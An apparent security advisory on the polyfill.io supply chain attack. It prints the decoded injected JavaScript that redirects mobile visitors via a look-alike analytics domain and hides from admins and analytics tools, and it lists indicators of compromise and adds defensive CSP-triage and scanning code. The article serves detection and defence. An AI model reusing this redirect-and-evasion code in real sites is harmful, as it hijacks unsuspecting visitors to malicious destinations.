A New Wave of Supply Chain Attacks: The Polyfill Supply Chain Attack

Update June 25th: Google has already started blocking Google Ads for eCommerce sites that use polyfill.io.

Imagine one of the most widely used libraries on the internet being compromised, affecting over 100,000 websites. Sounds like a nightmare? Unfortunately, this has become a reality with the polyfill supply chain attack. The polyfill.js is a popular open-source library that helps support older browsers, and it’s been embedded in websites like JSTOR, Intuit, and the World Economic Forum. However, a sinister turn of events has unfolded.

A Brief Background

In February this year, a Chinese company acquired both the domain and the GitHub account of polyfill.io. Since then, the domain has been injecting malware into mobile devices via any site that embeds cdn.polyfill.io. Complaints and reports raised on the GitHub repository were swiftly removed, leaving many unsuspecting users exposed.

The Attack Vector

The polyfill code is dynamically generated based on HTTP headers, presenting multiple attack vectors. One decoded malware by Sansec redirects mobile users to a sports betting site using a fake Google Analytics domain (www.googie-anaiytics.com). The malware is sophisticated, with specific protections against reverse engineering, activation only on specific mobile devices at specific times, and deactivation when it detects an admin user or web analytics service. This sophisticated method ensures it remains undetected in website statistics.


Recommendations and Alternatives

The original author of Polyfill recommends discontinuing its use as modern browsers no longer require it. Alternatives from Fastly and Cloudflare are available for those who still need polyfill support.

This incident is a textbook example of a supply chain attack, emphasizing the importance of monitoring the code your users are loading. Sansec offers a free CSP monitoring service, Sansec Watch, to help detect such issues. Additionally, their eComscan backend scanner has been updated to detect the compromised polyfill.io.
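The paragraph above recommends monitoring the code your users load, for example with a CSP monitoring service. The following is an added example (not the article's or Sansec's code) of the triage logic behind such a service: a browser enforcing a `Content-Security-Policy-Report-Only` header sends a JSON violation report for every script it would have blocked, and this function turns each report into a verdict. The allowlist, the sample reports and the severity names are constructed for the example; the flagged hosts come from the article's indicators of compromise.

```javascript
// Added example: triage Content-Security-Policy violation reports
// (the legacy `csp-report` JSON body produced by the report-uri directive).

// Hosts this site intentionally loads scripts from (constructed allowlist).
const ALLOWED_SCRIPT_HOSTS = new Set([
  "example.com",
  "www.googletagmanager.com",
  "www.google-analytics.com",
]);

// Hosts from the article's indicators of compromise, plus the compromised CDN.
const KNOWN_BAD_HOSTS = new Set([
  "kuurza.com",
  "www.googie-anaiytics.com",
  "cdn.polyfill.io",
]);

// Extract the hostname from a blocked-uri. Browsers may send a bare keyword
// such as "inline" or "eval" instead of a URL; those have no host.
function hostOf(blockedUri) {
  try {
    return new URL(blockedUri).hostname.toLowerCase();
  } catch (_) {
    return null;
  }
}

// Classify one report. Returns { severity, reason, host? }.
function triageCspReport(body) {
  const report = body["csp-report"];
  if (!report) return { severity: "ignore", reason: "not a csp-report" };
  const directive =
    report["effective-directive"] || report["violated-directive"] || "";
  // Only script loads matter here; style/img violations are noise for this case.
  // startsWith also covers the modern "script-src-elem" directive.
  if (!directive.startsWith("script-src")) {
    return { severity: "info", reason: `non-script directive ${directive}` };
  }
  const host = hostOf(report["blocked-uri"] || "");
  if (host === null) {
    return { severity: "info", reason: `inline/eval script blocked: ${report["blocked-uri"]}` };
  }
  if (KNOWN_BAD_HOSTS.has(host)) {
    return { severity: "critical", reason: `known IoC host ${host}`, host };
  }
  if (!ALLOWED_SCRIPT_HOSTS.has(host)) {
    return { severity: "warning", reason: `unexpected third-party script host ${host}`, host };
  }
  return { severity: "ok", reason: `allowed host ${host}`, host };
}

// Count verdicts over a batch of reports.
function summarize(reports) {
  const counts = { critical: 0, warning: 0, info: 0, ok: 0, ignore: 0 };
  for (const r of reports) counts[triageCspReport(r).severity]++;
  return counts;
}

// Constructed sample reports, shaped like what a browser POSTs to report-uri.
// The first one is what the payload's second-stage load would produce on a
// site whose policy allows cdn.polyfill.io but not the fake analytics host.
const SAMPLE_REPORTS = [
  { "csp-report": { "document-uri": "https://example.com/checkout",
      "effective-directive": "script-src",
      "blocked-uri": "https://www.googie-anaiytics.com/html/checkcachehw.js",
      "original-policy": "script-src 'self' cdn.polyfill.io; report-uri /csp" } },
  { "csp-report": { "document-uri": "https://example.com/",
      "effective-directive": "script-src",
      "blocked-uri": "https://www.googletagmanager.com/gtm.js" } },
  { "csp-report": { "document-uri": "https://example.com/",
      "effective-directive": "img-src",
      "blocked-uri": "https://tracker.example.net/pixel.gif" } },
  { "csp-report": { "document-uri": "https://example.com/",
      "effective-directive": "script-src",
      "blocked-uri": "inline" } },
];

console.log(summarize(SAMPLE_REPORTS));
```

The point of the report-only mode is that the policy does not have to be perfect on day one: every unexpected script host shows up as a warning, and a host that matches a published indicator is escalated immediately. In this incident the first-party page legitimately allowed cdn.polyfill.io, so the tell-tale event is the second-stage load from the look-alike analytics domain, which is exactly the report the sample shows.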


Example of Malicious Payload

The malicious payload shows how it targets mobile devices, redirects users, and avoids detection. Here is the decoded code, reformatted for readability:

// Returns true on Windows and Mac desktops; the redirect is suppressed for them.
function isPc() {
  try {
    var _isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
      _isMac = navigator.platform == "Mac68K" ||
      navigator.platform == "MacPPC" ||
      navigator.platform == "Macintosh" ||
      navigator.platform == "MacIntel";
    return _isMac || _isWin;
  } catch (_0x44e1f6) {
    return false;
  }
}

// Second stage: load a script from the look-alike analytics domain and, if it
// sets the global `usercache` flag, redirect the browser to the target URL.
function vfed_update(_0x5ae1f8) {
  _0x5ae1f8 !== "" &&
    loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {
      if (usercache == true) {
        window.location.href = _0x5ae1f8;
      }
    });
}

// Decides whether this visitor gets redirected. Only mobile user agents are
// considered; the target is chosen by host, referrer, hour of day and a random roll.
function check_tiaozhuan() {
  var _isMobile = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
  if (_isMobile) {
    var _curHost = window.location.host,
      _ref = document.referrer,
      _redirectURL = "",
      _kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
      _rnd = Math.floor(Math.random() * 100 + 1),
      _date = new Date(),
      _hours = _date.getHours();
    
    if (_curHost.indexOf("www.dxtv1.com") !== -1 || _curHost.indexOf("www.ys752.com") !== -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_curHost.indexOf("shuanshu.com.com") !== -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else {
      if (_hours >= 0 && _hours < 2 && _rnd <= 10) {
        _redirectURL = _kuurzaBitGet;
      } else if (_hours >= 2 && _hours < 4 && _rnd <= 15) {
        _redirectURL = _kuurzaBitGet;
      } else if (_hours >= 4 && _hours < 7 && _rnd <= 20) {
        _redirectURL = _kuurzaBitGet;
      } else if (_hours >= 7 && _hours < 8 && _rnd <= 10) {
        _redirectURL = _kuurzaBitGet;
      } else if (_rnd <= 10) {
        _redirectURL = _kuurzaBitGet;
      }
    }
    
    // Skip desktops and any visitor whose cookies look like a site admin's.
    if (_redirectURL != "" && !isPc() && document.cookie.indexOf("admin_id") == -1 && document.cookie.indexOf("adminlevels") == -1) {
      vfed_update(_redirectURL);
    }
  }
}

// Look for common web analytics tags in the page source; if any is present the
// redirect check is deferred by two seconds, otherwise it runs immediately.
let _outerPage = document.documentElement.outerHTML,
  bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
  wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
  aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
  aplausix = _outerPage.indexOf(".plausible.io") != -1,
  statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
  ? setTimeout(check_tiaozhuan, 2000)
  : check_tiaozhuan();

Indicators of Compromise

To protect your systems, be on the lookout for these URLs:

  • https://kuurza[.]com/redirect?from=bitget
  • https://www.googie-anaiytics[.]com/html/checkcachehw.js
  • https://www.googie-anaiytics[.]com/ga.js
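Indicators like the ones above are published defanged (`kuurza[.]com`), so a scanner has to refang them before matching. The following added example (not the article's or Sansec's code) scans a saved copy of a page's HTML for `<script src>` tags pointing at the compromised CDN or at an indicator host, and separately for indicator hosts appearing anywhere else in the source, such as inside an inline script like the payload shown earlier. The sample page, its URL and the `/v3/polyfill.min.js` path are constructed for the example.

```javascript
// Added example: scan page source for the compromised CDN and the IoC hosts.

// Indicators exactly as published in the article, kept defanged in the source.
const IOC_URLS_DEFANGED = [
  "https://kuurza[.]com/redirect?from=bitget",
  "https://www.googie-anaiytics[.]com/html/checkcachehw.js",
  "https://www.googie-anaiytics[.]com/ga.js",
];

// Turn a defanged indicator back into a real URL: "[.]" -> ".", "hxxp" -> "http".
function refang(ioc) {
  return ioc.replace(/\[\.\]/g, ".").replace(/^hxxp/i, "http");
}

// Hostnames worth flagging: the IoC hosts plus the compromised CDN itself.
const FLAGGED_HOSTS = new Set(
  IOC_URLS_DEFANGED.map((u) => new URL(refang(u)).hostname.toLowerCase())
    .concat(["cdn.polyfill.io"])
);

// Pull the src attribute of every <script> tag. A regex is adequate for
// auditing your own saved HTML; it is not a general HTML parser.
function externalScriptSources(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Resolve a src (relative or protocol-relative, e.g. //cdn.polyfill.io/...)
// against the page URL and return its hostname, or null if unparsable.
function hostOfSrc(src, pageUrl) {
  try {
    return new URL(src, pageUrl).hostname.toLowerCase();
  } catch (_) {
    return null;
  }
}

// Scan one page. Findings of type "script-tag" are flagged <script src> hosts;
// findings of type "string" are flagged hosts that occur elsewhere in the
// source (inline scripts, attributes) and were not already reported.
function scanPage(html, pageUrl) {
  const findings = [];
  for (const src of externalScriptSources(html)) {
    const host = hostOfSrc(src, pageUrl);
    if (host && FLAGGED_HOSTS.has(host)) {
      findings.push({ type: "script-tag", host, src });
    }
  }
  const lower = html.toLowerCase();
  for (const host of FLAGGED_HOSTS) {
    if (lower.includes(host) && !findings.some((f) => f.host === host)) {
      findings.push({ type: "string", host });
    }
  }
  return findings;
}

// Constructed sample page: embeds the CDN the usual way and also carries a
// fragment of the injected second-stage loader.
const SAMPLE_PAGE_URL = "https://example.com/";
const SAMPLE_HTML = `<!doctype html><html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js"></script>
<script src="/static/app.js"></script>
<script>loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {});</script>
</head><body>hello</body></html>`;

console.log(scanPage(SAMPLE_HTML, SAMPLE_PAGE_URL));
```

Matching on the parsed hostname rather than on raw substrings keeps first-party scripts such as `/static/app.js` out of the results, while the second pass over the whole source still catches the look-alike analytics host when it is buried in an inline script. A hit on cdn.polyfill.io alone is already actionable here: since the CDN generates the script per request from the visitor's headers, Subresource Integrity cannot pin it, which is why the recommendation above is to remove the tag rather than try to verify it.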


Stay Informed

To stay ahead of such threats, it’s crucial to remain informed and vigilant. Here are some resources that delve deeper into similar attacks and preventive measures:

In conclusion, the polyfill supply chain attack is a wake-up call for all of us. It highlights the critical importance of monitoring third-party libraries and ensuring the integrity of the software supply chain. By taking proactive steps, using trusted alternatives, and staying informed, we can mitigate such risks and protect our digital assets.
